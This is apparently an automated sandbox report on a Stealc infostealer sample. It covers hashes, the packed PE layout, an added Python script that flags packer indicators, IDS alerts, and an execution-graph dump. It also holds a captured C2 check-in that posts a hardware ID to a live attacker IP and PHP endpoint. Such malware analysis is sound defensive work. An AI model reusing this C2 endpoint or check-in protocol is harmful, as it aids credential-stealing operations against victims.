Analysis ID: 1541419
Start date and time: 2024-10-24 20:19:05 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 3m 2s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 83
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: file.exe
                        No simulations
IP context for 185.215.113.37 (other samples that contacted the same host)

Associated Sample Name | Detection | Threat Name                                                    | Context
file.exe               | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc     | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | Stealc, Vidar                                                  | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc     | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | Stealc                                                         | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc     | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | Stealc, Vidar                                                  | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | Stealc                                                         | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | Stealc, Vidar                                                  | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | Stealc                                                         | 185.215.113.37/e2b1563c6670f193.php
file.exe               | malicious | Stealc, Vidar                                                  | 185.215.113.37/e2b1563c6670f193.php

No domain context

ASN context for WHOLESALECONNECTIONSNL (other samples that contacted the same ASN)

Associated Sample Name | Detection | Threat Name                                                    | Context
file.exe               | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc     | 185.215.113.16
file.exe               | malicious | Stealc, Vidar                                                  | 185.215.113.37
file.exe               | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc     | 185.215.113.16
file.exe               | malicious | Stealc                                                         | 185.215.113.37
file.exe               | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc     | 185.215.113.16
file.exe               | malicious | Stealc, Vidar                                                  | 185.215.113.37
file.exe               | malicious | Stealc                                                         | 185.215.113.37
file.exe               | malicious | Stealc, Vidar                                                  | 185.215.113.37
file.exe               | malicious | Stealc                                                         | 185.215.113.37
file.exe               | malicious | Stealc, Vidar                                                  | 185.215.113.37

No JA3 fingerprint or dropped file context
                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94578014704454
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'865'216 bytes
MD5: f8499202b78a41093fc86e4ee8be2d0b
SHA1: 56066a06e2ae405ad5e7dc5be7f37283aa742fa0
SHA256: e81eb5bcb9497a84f1f496cf0af37c234f8e80aaf0bb179e153005592ef67321
SHA512: 3668d4267ba66bab0a93d60c773dda38eab7d3ec4751d869b87a1ccf4e7b88a0fabc7082d375f9190a1800f9467ca619bfbd87bf71d418e273b42882c79e07ed
SSDEEP: 49152:JdN6M75rSnGcIoc3MNTgt69xS0NRVFkd:l19SnaoWt694GF
TLSH: 68853390286BC9BDC08C84FDF3160CA53A789F1E89659B52D2AC133FA3296D1517F6D8
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xaaa000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Entrypoint instructions (disassembly at 0xaaa000):
                        jmp 00007FECB0898A3Ah
                        andps xmm3, dqword ptr [eax+eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        jmp 00007FECB089AA35h
                        add byte ptr [ebx], cl
                        or al, byte ptr [eax]
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+00h], ah
                        add byte ptr [eax], al
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Data Directories

Name                                  | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT          | 0x25d050        | 0x64         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_EXCEPTION       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY        | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC       | 0x25d1f8        | 0x8          | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG           | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS             | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT             | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED        | 0x0             | 0x0          |
Sections

Name      | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type            | Entropy            | Characteristics
(empty)   | 0x1000          | 0x25b000     | 0x22800  | 6dc8a185ba5cbf85e03a56d0f5b18cf5 | unknown  | unknown             | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     | 0x25c000        | 0x1000       | 0x0      | d41d8cd98f00b204e9800998ecf8427e | False    | 0                   | empty                | 0.0                | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    | 0x25d000        | 0x1000       | 0x200    | c60c4959cc8d384ac402730cc6842bb0 | False    | 0.1328125           | data                 | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(empty)   | 0x25e000        | 0x2a9000     | 0x200    | 25dd88df222d466250ad73a1e20b0601 | unknown  | unknown             | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
nxusumaz  | 0x507000        | 0x1a2000     | 0x1a1400 | e723b2e1510566ed818a2ec25da32ba9 | False    | 0.9947304242810066  | data                 | 7.954159005583094  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
hgxnhwve  | 0x6a9000        | 0x1000       | 0x400    | bdbcd95e1dccd879da921042fe06c99c | False    | 0.7890625           | data                 | 6.144568537420407  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  | 0x6aa000        | 0x3000       | 0x2200   | 8e38bfa82d80d09a1d368005423a6aff | False    | 0.04377297794117647 | DOS executable (COM) | 0.5576186273692433 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
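The section table above carries the usual fingerprints of a packed binary: two sections with no name, five sections that are readable, writable and executable at once, a near-empty section whose virtual size is thousands of times its raw size (the runtime unpacking target), a section near maximum entropy (nxusumaz, 7.95 bits/byte) and an entry point in .taggant rather than .text. The following script, an added example written for this page and not part of the Joe Sandbox report, parses raw IMAGE_SECTION_HEADER records and flags each of those conditions; the section table is re-encoded from the values reported above (raw-data file offsets are not in the report and are left at zero), and the thresholds and the list of "standard" section names are this example's own choices.

```python
import math
import struct
from dataclasses import dataclass
from typing import List, Optional

# IMAGE_SECTION_HEADER (40 bytes): Name[8], VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics.
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)

IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

# Names a normal compiler/linker emits (this example's own list); anything else deserves a look.
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".bss", ".tls", ".CRT", "CODE", "DATA"}


@dataclass
class Section:
    name: str
    virtual_address: int
    virtual_size: int
    raw_size: int
    characteristics: int

    @property
    def rwx(self) -> bool:
        return bool(self.characteristics & IMAGE_SCN_MEM_EXECUTE
                    and self.characteristics & IMAGE_SCN_MEM_WRITE)

    def contains_rva(self, rva: int) -> bool:
        return self.virtual_address <= rva < self.virtual_address + self.virtual_size


def parse_section_headers(blob: bytes, count: int) -> List[Section]:
    """Decode `count` consecutive IMAGE_SECTION_HEADER records from `blob`."""
    out = []
    for i in range(count):
        r = struct.unpack_from(SECTION_HEADER_FMT, blob, i * SECTION_HEADER_SIZE)
        out.append(Section(r[0].rstrip(b"\x00").decode("latin-1"), r[2], r[1], r[3], r[9]))
    return out


def section_for_rva(sections: List[Section], rva: int) -> Optional[Section]:
    return next((s for s in sections if s.contains_rva(rva)), None)


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def triage(sections: List[Section], entry_rva: int) -> List[str]:
    """Packer indicators in a section table; the 8x size ratio is an assumed threshold."""
    findings = []
    for s in sections:
        label = repr(s.name) if s.name else "<unnamed>"
        if not s.name or not all(32 < ord(c) < 127 for c in s.name):
            findings.append(f"{label}: empty or non-printable section name")
        elif s.name not in STANDARD_NAMES:
            findings.append(f"{label}: non-standard section name")
        if s.rwx:
            findings.append(f"{label}: section is writable and executable")
        if s.raw_size and s.virtual_size > 8 * s.raw_size:
            findings.append(f"{label}: virtual size {s.virtual_size:#x} far exceeds "
                            f"raw size {s.raw_size:#x} (runtime unpack target)")
    ep = section_for_rva(sections, entry_rva)
    if ep is None:
        findings.append(f"entry point {entry_rva:#x} lies outside every section")
    elif ep.name not in STANDARD_NAMES:
        findings.append(f"entry point {entry_rva:#x} lies in non-standard section {ep.name!r}")
    return findings


def _hdr(name: bytes, vsize: int, va: int, raw: int, chars: int) -> bytes:
    return struct.pack(SECTION_HEADER_FMT, name, vsize, va, raw, 0, 0, 0, 0, 0, chars)


RWX = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RW = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE

# The section table of file.exe as reported, re-encoded as raw headers (constructed input).
SAMPLE_SECTION_TABLE = b"".join([
    _hdr(b"",         0x25B000, 0x001000, 0x022800, RWX),
    _hdr(b".rsrc",    0x001000, 0x25C000, 0x000000, RW),
    _hdr(b".idata",   0x001000, 0x25D000, 0x000200, RW),
    _hdr(b"",         0x2A9000, 0x25E000, 0x000200, RWX),
    _hdr(b"nxusumaz", 0x1A2000, 0x507000, 0x1A1400, RWX),
    _hdr(b"hgxnhwve", 0x001000, 0x6A9000, 0x000400, RWX),
    _hdr(b".taggant", 0x003000, 0x6AA000, 0x002200, RWX),
])
IMAGE_BASE = 0x400000
ENTRY_POINT_RVA = 0xAAA000 - IMAGE_BASE   # the reported entrypoint is a VA; .taggant begins at RVA 0x6aa000


def triage_sample() -> List[str]:
    return triage(parse_section_headers(SAMPLE_SECTION_TABLE, 7), ENTRY_POINT_RVA)


if __name__ == "__main__":
    for line in triage_sample():
        print(line)
```

Run against a real file, the 40-byte headers start at the PE header offset plus 24 plus SizeOfOptionalHeader, and NumberOfSections comes from the COFF header; feed each section's raw bytes to shannon_entropy to reproduce the Entropy column. Note that RWX sections and an entry point outside .text are not proof of malice on their own (some legitimate protectors produce the same layout), which is why the report's verdict rests on behaviour and Yara matches rather than on the PE layout alone.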
Imports

DLL          | Import
kernel32.dll | lstrcpy

Suricata IDS Alerts

Timestamp                        | SID     | Signature                                            | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
2024-10-24T20:20:04.670212+0200  | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in      | 1        | 192.168.2.5 | 49704       | 185.215.113.37 | 80        | TCP
                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                        Oct 24, 2024 20:20:03.443120956 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 24, 2024 20:20:03.448626041 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 24, 2024 20:20:03.448718071 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 24, 2024 20:20:03.448885918 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 24, 2024 20:20:03.454312086 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 24, 2024 20:20:04.372705936 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 24, 2024 20:20:04.372777939 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 24, 2024 20:20:04.376467943 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 24, 2024 20:20:04.383615017 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 24, 2024 20:20:04.670043945 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                        Oct 24, 2024 20:20:04.670212030 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        Oct 24, 2024 20:20:06.898168087 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                        • 185.215.113.37
                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 4788 | C:\Users\user\Desktop\file.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Oct 24, 2024 20:20:03.448885918 CEST | 89 | OUT | GET / HTTP/1.1
                        Host: 185.215.113.37
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Oct 24, 2024 20:20:04.372705936 CEST | 203 | IN | HTTP/1.1 200 OK
                        Date: Thu, 24 Oct 2024 18:20:04 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 0
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Oct 24, 2024 20:20:04.376467943 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                        Content-Type: multipart/form-data; boundary=----BFHDHJKKJDHJJJJKEGHI
                        Host: 185.215.113.37
                        Content-Length: 211
                        Connection: Keep-Alive
                        Cache-Control: no-cache
                        Data Raw: 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 42 37 38 43 33 45 34 31 30 34 30 38 31 39 30 37 36 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 48 44 48 4a 4b 4b 4a 44 48 4a 4a 4a 4a 4b 45 47 48 49 2d 2d 0d 0a
                        Data Ascii:
                        ------BFHDHJKKJDHJJJJKEGHI
                        Content-Disposition: form-data; name="hwid"

                        D57B78C3E4104081907672
                        ------BFHDHJKKJDHJJJJKEGHI
                        Content-Disposition: form-data; name="build"

                        doma
                        ------BFHDHJKKJDHJJJJKEGHI--
                        Oct 24, 2024 20:20:04.670043945 CEST | 210 | IN | HTTP/1.1 200 OK
                        Date: Thu, 24 Oct 2024 18:20:04 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Content-Length: 8
                        Keep-Alive: timeout=5, max=99
                        Connection: Keep-Alive
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 59 6d 78 76 59 32 73 3d
                        Data Ascii: YmxvY2s=



                        Target ID:0
                        Start time:14:19:59
                        Start date:24/10/2024
                        Path:C:\Users\user\Desktop\file.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\file.exe"
                        Imagebase:0x400000
                        File size:1'865'216 bytes
                        MD5 hash:F8499202B78A41093FC86E4EE8BE2D0B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2089690608.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2133647068.000000000126E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:true


                          Execution Graph

                          Execution Coverage:8.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:9.7%
                          Total number of Nodes:2000
                          Total number of Limit Nodes:24
14634->14635 14636 4015d9 14635->14636 14637 41a7a0 lstrcpy 14636->14637 14638 401663 14637->14638 14639 415510 14638->14639 14640 415521 14639->14640 14641 41a820 2 API calls 14640->14641 14642 41552e 14641->14642 14643 41a820 2 API calls 14642->14643 14644 41553b 14643->14644 14645 41a820 2 API calls 14644->14645 14646 415548 14645->14646 14647 41a740 lstrcpy 14646->14647 14648 415555 14647->14648 14649 41a740 lstrcpy 14648->14649 14650 415562 14649->14650 14651 41a740 lstrcpy 14650->14651 14652 41556f 14651->14652 14653 41a740 lstrcpy 14652->14653 14693 41557c 14653->14693 14654 41a820 lstrlen lstrcpy 14654->14693 14655 415643 StrCmpCA 14655->14693 14656 4156a0 StrCmpCA 14658 4157dc 14656->14658 14656->14693 14657 41a7a0 lstrcpy 14657->14693 14659 41a8a0 lstrcpy 14658->14659 14660 4157e8 14659->14660 14661 41a820 2 API calls 14660->14661 14664 4157f6 14661->14664 14662 41a740 lstrcpy 14662->14693 14663 4151f0 20 API calls 14663->14693 14666 41a820 2 API calls 14664->14666 14665 415856 StrCmpCA 14667 415991 14665->14667 14665->14693 14670 415805 14666->14670 14669 41a8a0 lstrcpy 14667->14669 14668 41a8a0 lstrcpy 14668->14693 14671 41599d 14669->14671 14672 401670 lstrcpy 14670->14672 14673 41a820 2 API calls 14671->14673 14690 415811 14672->14690 14675 4159ab 14673->14675 14674 4152c0 25 API calls 14674->14693 14679 41a820 2 API calls 14675->14679 14676 415a0b StrCmpCA 14677 415a16 Sleep 14676->14677 14678 415a28 14676->14678 14677->14693 14680 41a8a0 lstrcpy 14678->14680 14681 4159ba 14679->14681 14682 415a34 14680->14682 14683 401670 lstrcpy 14681->14683 14684 41a820 2 API calls 14682->14684 14683->14690 14685 415a43 14684->14685 14686 41a820 2 API calls 14685->14686 14687 415a52 14686->14687 14689 401670 lstrcpy 14687->14689 14688 41578a StrCmpCA 14688->14693 14689->14690 14690->13746 14691 401590 lstrcpy 14691->14693 14692 41593f StrCmpCA 14692->14693 14693->14654 14693->14655 14693->14656 14693->14657 14693->14662 14693->14663 14693->14665 14693->14668 
14693->14674 14693->14676 14693->14688 14693->14691 14693->14692 14695 417553 GetVolumeInformationA 14694->14695 14696 41754c 14694->14696 14697 417591 14695->14697 14696->14695 14698 4175fc GetProcessHeap RtlAllocateHeap 14697->14698 14699 417619 14698->14699 14700 417628 wsprintfA 14698->14700 14701 41a740 lstrcpy 14699->14701 14702 41a740 lstrcpy 14700->14702 14703 415da7 14701->14703 14702->14703 14703->13767 14705 41a7a0 lstrcpy 14704->14705 14706 404899 14705->14706 15758 4047b0 14706->15758 14708 4048a5 14709 41a740 lstrcpy 14708->14709 14710 4048d7 14709->14710 14711 41a740 lstrcpy 14710->14711 14712 4048e4 14711->14712 14713 41a740 lstrcpy 14712->14713 14714 4048f1 14713->14714 14715 41a740 lstrcpy 14714->14715 14716 4048fe 14715->14716 14717 41a740 lstrcpy 14716->14717 14718 40490b InternetOpenA StrCmpCA 14717->14718 14719 404944 14718->14719 14720 404ecb InternetCloseHandle 14719->14720 15764 418b60 14719->15764 14722 404ee8 14720->14722 15779 409ac0 CryptStringToBinaryA 14722->15779 14723 404963 15772 41a920 14723->15772 14726 404976 14728 41a8a0 lstrcpy 14726->14728 14733 40497f 14728->14733 14729 41a820 2 API calls 14730 404f05 14729->14730 14731 41a9b0 4 API calls 14730->14731 14734 404f1b 14731->14734 14732 404f27 codecvt 14736 41a7a0 lstrcpy 14732->14736 14737 41a9b0 4 API calls 14733->14737 14735 41a8a0 lstrcpy 14734->14735 14735->14732 14749 404f57 14736->14749 14738 4049a9 14737->14738 14739 41a8a0 lstrcpy 14738->14739 14740 4049b2 14739->14740 14741 41a9b0 4 API calls 14740->14741 14742 4049d1 14741->14742 14743 41a8a0 lstrcpy 14742->14743 14744 4049da 14743->14744 14745 41a920 3 API calls 14744->14745 14746 4049f8 14745->14746 14747 41a8a0 lstrcpy 14746->14747 14748 404a01 14747->14748 14750 41a9b0 4 API calls 14748->14750 14749->13770 14751 404a20 14750->14751 14752 41a8a0 lstrcpy 14751->14752 14753 404a29 14752->14753 14754 41a9b0 4 API calls 14753->14754 14755 404a48 14754->14755 14756 41a8a0 lstrcpy 14755->14756 14757 404a51 14756->14757 
14758 41a9b0 4 API calls 14757->14758 14759 404a7d 14758->14759 14760 41a920 3 API calls 14759->14760 14761 404a84 14760->14761 14762 41a8a0 lstrcpy 14761->14762 14763 404a8d 14762->14763 14764 404aa3 InternetConnectA 14763->14764 14764->14720 14765 404ad3 HttpOpenRequestA 14764->14765 14767 404b28 14765->14767 14768 404ebe InternetCloseHandle 14765->14768 14769 41a9b0 4 API calls 14767->14769 14768->14720 14770 404b3c 14769->14770 14771 41a8a0 lstrcpy 14770->14771 14772 404b45 14771->14772 14773 41a920 3 API calls 14772->14773 14774 404b63 14773->14774 14775 41a8a0 lstrcpy 14774->14775 14776 404b6c 14775->14776 14777 41a9b0 4 API calls 14776->14777 14778 404b8b 14777->14778 14779 41a8a0 lstrcpy 14778->14779 14780 404b94 14779->14780 14781 41a9b0 4 API calls 14780->14781 14782 404bb5 14781->14782 14783 41a8a0 lstrcpy 14782->14783 14784 404bbe 14783->14784 14785 41a9b0 4 API calls 14784->14785 14786 404bde 14785->14786 14787 41a8a0 lstrcpy 14786->14787 14788 404be7 14787->14788 14789 41a9b0 4 API calls 14788->14789 14790 404c06 14789->14790 14791 41a8a0 lstrcpy 14790->14791 14792 404c0f 14791->14792 14793 41a920 3 API calls 14792->14793 14794 404c2d 14793->14794 14795 41a8a0 lstrcpy 14794->14795 14796 404c36 14795->14796 14797 41a9b0 4 API calls 14796->14797 14798 404c55 14797->14798 14799 41a8a0 lstrcpy 14798->14799 14800 404c5e 14799->14800 14801 41a9b0 4 API calls 14800->14801 14802 404c7d 14801->14802 14803 41a8a0 lstrcpy 14802->14803 14804 404c86 14803->14804 14805 41a920 3 API calls 14804->14805 14806 404ca4 14805->14806 14807 41a8a0 lstrcpy 14806->14807 14808 404cad 14807->14808 14809 41a9b0 4 API calls 14808->14809 14810 404ccc 14809->14810 14811 41a8a0 lstrcpy 14810->14811 14812 404cd5 14811->14812 14813 41a9b0 4 API calls 14812->14813 14814 404cf6 14813->14814 14815 41a8a0 lstrcpy 14814->14815 14816 404cff 14815->14816 14817 41a9b0 4 API calls 14816->14817 14818 404d1f 14817->14818 14819 41a8a0 lstrcpy 14818->14819 14820 404d28 14819->14820 14821 41a9b0 4 
API calls 14820->14821 14822 404d47 14821->14822 14823 41a8a0 lstrcpy 14822->14823 14824 404d50 14823->14824 14825 41a920 3 API calls 14824->14825 14826 404d6e 14825->14826 14827 41a8a0 lstrcpy 14826->14827 14828 404d77 14827->14828 14829 41a740 lstrcpy 14828->14829 14830 404d92 14829->14830 14831 41a920 3 API calls 14830->14831 14832 404db3 14831->14832 14833 41a920 3 API calls 14832->14833 14834 404dba 14833->14834 14835 41a8a0 lstrcpy 14834->14835 14836 404dc6 14835->14836 14837 404de7 lstrlen 14836->14837 14838 404dfa 14837->14838 14839 404e03 lstrlen 14838->14839 15778 41aad0 14839->15778 14841 404e13 HttpSendRequestA 14842 404e32 InternetReadFile 14841->14842 14843 404e67 InternetCloseHandle 14842->14843 14844 404e5e 14842->14844 14847 41a800 14843->14847 14844->14842 14844->14843 14846 41a9b0 4 API calls 14844->14846 14848 41a8a0 lstrcpy 14844->14848 14846->14844 14847->14768 14848->14844 15785 41aad0 14849->15785 14851 4117c4 StrCmpCA 14852 4117d7 14851->14852 14853 4117cf ExitProcess 14851->14853 14854 4119c2 14852->14854 14855 4118ad StrCmpCA 14852->14855 14856 4118cf StrCmpCA 14852->14856 14857 4118f1 StrCmpCA 14852->14857 14858 411951 StrCmpCA 14852->14858 14859 411970 StrCmpCA 14852->14859 14860 411913 StrCmpCA 14852->14860 14861 411932 StrCmpCA 14852->14861 14862 41185d StrCmpCA 14852->14862 14863 41187f StrCmpCA 14852->14863 14864 41a820 lstrlen lstrcpy 14852->14864 14854->13772 14855->14852 14856->14852 14857->14852 14858->14852 14859->14852 14860->14852 14861->14852 14862->14852 14863->14852 14864->14852 14866 41a7a0 lstrcpy 14865->14866 14867 405979 14866->14867 14868 4047b0 2 API calls 14867->14868 14869 405985 14868->14869 14870 41a740 lstrcpy 14869->14870 14871 4059ba 14870->14871 14872 41a740 lstrcpy 14871->14872 14873 4059c7 14872->14873 14874 41a740 lstrcpy 14873->14874 14875 4059d4 14874->14875 14876 41a740 lstrcpy 14875->14876 14877 4059e1 14876->14877 14878 41a740 lstrcpy 14877->14878 14879 4059ee InternetOpenA StrCmpCA 14878->14879 14880 
405a1d 14879->14880 14881 405fc3 InternetCloseHandle 14880->14881 14882 418b60 3 API calls 14880->14882 14883 405fe0 14881->14883 14884 405a3c 14882->14884 14886 409ac0 4 API calls 14883->14886 14885 41a920 3 API calls 14884->14885 14887 405a4f 14885->14887 14888 405fe6 14886->14888 14889 41a8a0 lstrcpy 14887->14889 14890 41a820 2 API calls 14888->14890 14893 40601f codecvt 14888->14893 14894 405a58 14889->14894 14891 405ffd 14890->14891 14892 41a9b0 4 API calls 14891->14892 14895 406013 14892->14895 14897 41a7a0 lstrcpy 14893->14897 14898 41a9b0 4 API calls 14894->14898 14896 41a8a0 lstrcpy 14895->14896 14896->14893 14906 40604f 14897->14906 14899 405a82 14898->14899 14900 41a8a0 lstrcpy 14899->14900 14901 405a8b 14900->14901 14902 41a9b0 4 API calls 14901->14902 14903 405aaa 14902->14903 14904 41a8a0 lstrcpy 14903->14904 14905 405ab3 14904->14905 14907 41a920 3 API calls 14905->14907 14906->13778 14908 405ad1 14907->14908 14909 41a8a0 lstrcpy 14908->14909 14910 405ada 14909->14910 14911 41a9b0 4 API calls 